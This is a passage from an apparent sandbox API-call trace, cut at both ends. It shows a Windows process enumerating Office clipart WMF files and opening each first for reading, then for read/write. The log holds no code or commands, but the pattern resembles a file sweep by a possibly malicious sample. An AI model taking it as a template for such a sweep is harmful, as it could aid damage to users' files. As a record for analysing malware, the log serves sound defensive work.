ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01140_.WMF", cAlternateFileName="")) returned 1 [0104.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.047] AreFileApisANSI () returned 1 [0104.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.047] AreFileApisANSI () returned 1 [0104.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.047] GetFileType (hFile=0x33c) returned 0x1 [0104.047] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.048] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.048] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.048] CloseHandle (hObject=0x33c) returned 1 [0104.048] AreFileApisANSI () returned 1 [0104.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.048] GetFileType (hFile=0x33c) returned 0x1 [0104.048] CloseHandle (hObject=0x33c) returned 1 [0104.048] AreFileApisANSI () returned 1 [0104.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.048] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe20)) returned 1 [0104.048] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.049] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x85c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01143_.WMF", cAlternateFileName="")) returned 1 [0104.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.049] AreFileApisANSI () returned 1 [0104.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.049] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.049] AreFileApisANSI () returned 1 [0104.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.049] GetFileType (hFile=0x33c) returned 0x1 [0104.049] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.049] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.049] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.050] CloseHandle (hObject=0x33c) returned 1 [0104.050] AreFileApisANSI () returned 1 [0104.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.050] GetFileType (hFile=0x33c) returned 0x1 [0104.050] CloseHandle (hObject=0x33c) returned 1 [0104.050] AreFileApisANSI () returned 1 [0104.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.050] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x85c)) returned 1 [0104.050] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.050] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.050] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xadc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01145_.WMF", cAlternateFileName="")) returned 1 [0104.050] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.050] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.050] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.050] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.050] AreFileApisANSI () returned 1 [0104.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.051] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.051] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.051] AreFileApisANSI () returned 1 [0104.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.060] GetFileType (hFile=0x33c) returned 0x1 [0104.060] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.060] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.060] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.060] CloseHandle (hObject=0x33c) returned 1 [0104.060] AreFileApisANSI () returned 1 [0104.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.060] GetFileType (hFile=0x33c) returned 0x1 [0104.061] CloseHandle (hObject=0x33c) returned 1 [0104.061] AreFileApisANSI () returned 1 [0104.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.061] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xadc)) returned 1 [0104.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.061] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaec, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01146_.WMF", cAlternateFileName="")) returned 1 [0104.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.061] AreFileApisANSI () returned 1 [0104.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.061] AreFileApisANSI () returned 1 [0104.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.062] GetFileType (hFile=0x33c) returned 0x1 [0104.062] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.062] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.062] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.062] CloseHandle (hObject=0x33c) returned 1 [0104.062] AreFileApisANSI () returned 1 [0104.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.062] GetFileType (hFile=0x33c) returned 0x1 [0104.062] CloseHandle (hObject=0x33c) returned 1 [0104.063] AreFileApisANSI () returned 1 [0104.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.063] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaec)) returned 1 [0104.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.063] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01151_.WMF", cAlternateFileName="")) returned 1 [0104.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.063] AreFileApisANSI () returned 1 [0104.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.063] AreFileApisANSI () returned 1 [0104.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.063] GetFileType (hFile=0x33c) returned 0x1 [0104.063] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.064] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.064] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.064] CloseHandle (hObject=0x33c) returned 1 [0104.064] AreFileApisANSI () returned 1 [0104.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.064] GetFileType (hFile=0x33c) returned 0x1 [0104.064] CloseHandle (hObject=0x33c) returned 1 [0104.064] AreFileApisANSI () returned 1 [0104.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.064] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb90)) returned 1 [0104.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.065] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, 